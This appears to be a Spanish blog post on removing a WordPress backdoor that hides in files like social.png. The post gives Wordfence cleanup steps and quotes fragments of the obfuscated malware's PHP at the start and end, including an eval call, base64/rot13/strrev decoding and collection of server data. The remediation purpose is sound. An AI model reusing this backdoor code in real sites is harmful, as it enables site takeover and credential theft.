}"; } eval( $WpjxSpMcLFVAFyrpTZyw ); } if ( ! defined( 'WP_OPTION_KEY' ) && ( function_exists( 'get_home_url' ) || function_exists( 'get_site_url' ) ) ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_client_properties_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url() ) , 3 , 5); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( get_site_url() ), 3 , 5 ); } else { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( $_SERVER[ 'DOCUMENT_ROOT' ] ) , 3 , 5); } define( 'WP_OPTION_KEY', $WDWTfYxwxTMIIsMmHXVV ); new mWocWcrhWpiDUTXuIwU( 0 ); } }
///////////////////////////////////////////////////////////////////////////////
Para quienes no saben mucho de desarrollo ni de seguridad, les diré cómo borrar estos archivos:
Necesitan tener a mano lo siguiente:
1.- Acceso por FTP o al file manager de su cuenta.
2.- Acceso de administrador al WordPress.
3.- Algo de tiempo y paciencia.
PASO 1:
Entrar al panel de administración de WordPress: escriban en el navegador la dirección de su página seguida de /wp-admin.
ejemplo: www.tupagina.com/wp-admin
PASO 2:
Ir a la sección plugins e instalar el plugin: "Wordfence" y activarlo.
PASO 3:
Después de activarlo, ir a la sección de administración del plugin y entrar donde dice Options.
PASO 4:
activar las siguientes opciones:
Scan theme files against repository versions for changes
Scan plugin files against repository versions for changes
Scan files outside your WordPress installation
Scan image files as if they were executable
y guardar los cambios.
PASO 5:
Ir ahora a la sección de administración del plugin y entrar donde dice Scan.
Comenzar un nuevo scan y esperar a que finalice.
El cuadro Scan Detailed Activity mostrará los archivos infectados.
PASO 6:
Cuando el scan muestre los archivos infectados, entra por FTP o por el file manager para limpiarlos.
Borra directamente solo los que sean png, jpg o gif, por ejemplo social.png; el código mostrado arriba también usa nombres numerados (social0.png, social1.png, ...) cuando social.png ya existe en la carpeta.
Los archivos php, por ejemplo functions.php, no los borres: edítalos y busca dentro un texto similar a:
include('social.png');
o similar a:
require('social.png');
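(Esta parte puede ser tediosa, ya que hay que leer línea tras línea. Ayuda buscar el texto "social" seguido de ".png", porque el código mostrado arriba comprueba ese mismo patrón, social[\d]*\.png, antes de modificar un archivo.)
Al encontrar esas líneas, bórrenlas y guarden el archivo. Revisen también los permisos: el código mostrado arriba intenta poner 0777 en las carpetas y 0666 en functions.php para poder escribir en ellos.
Después de este paso repitan el paso 5 hasta que ya no existan archivos maliciosos. Revisen además la lista de usuarios de WordPress y eliminen cualquier administrador que no reconozcan, ya que el código mostrado arriba asigna el rol 'administrator' y envía un usuario, contraseña y correo a un servidor externo; después cambien las contraseñas de las cuentas legítimas.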
Espero que esta publicación sea de su ayuda, para algún detalle pueden contactarme desde el formulario de contacto de este sitio y declaro que si tuvieran DIM WORKS CMS no tendrían estos problemas.
TIP: si quieren saber si su sitio está infectado, usen esta herramienta: http://scan.cryptophp.com/
EDIT UPDATE:
PASO 6:
En la nueva versión de Wordfence puedes borrar los archivos después de hacer el scan...
Te aparecerán en la parte de abajo (recuerda: borra solo aquellos que sean png, jpg o gif)
o los que tengan esta parte de código:
"
str_rot13( strrev( $ZRhtpGOgTZTZRdeSYVBw ) ) ); } if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ) ) { $RIDSsUypyvhaOoRUSAVT = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] / 100 ); if ( $RIDSsUypyvhaOoRUSAVT == 0 ) { $RIDSsUypyvhaOoRUSAVT = 5; } else { $RIDSsUypyvhaOoRUSAVT *= 5; } } else { $RIDSsUypyvhaOoRUSAVT = 5; } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $RIDSsUypyvhaOoRUSAVT ); } private function kxNFPkmoRjlpKMZgBBSt( $nAdZoAdkHIGJvIPtmRmT ) { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->ANVoslonRNQSwwQloQTx[ 'emails' ] as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = $fzzoeSAOApURHlkJwYWs; } foreach ( $this->keXZeLlUjrISqwBQePlM as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $fzzoeSAOApURHlkJwYWs ) ) ); } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $nAdZoAdkHIGJvIPtmRmT ); } private function bQhqyjECNagHOENBeGGx() { if ( ! defined( 'wp_getInfoData' ) ) { $ANVoslonRNQSwwQloQTx = array(); $ANVoslonRNQSwwQloQTx[ 'host' ] = $this->YJPpcHYXiHzJcujCRMrl(); $ANVoslonRNQSwwQloQTx[ 'page' ] = $_SERVER[ 'REQUEST_URI' ]; $ANVoslonRNQSwwQloQTx[ 'ip' ] = $_SERVER[ 'SERVER_ADDR' ]; $ANVoslonRNQSwwQloQTx[ 'eval' ] = $this->iIkbNPOMzHBEaGLuayXw();
"
Por: Oliver Leuyim Angel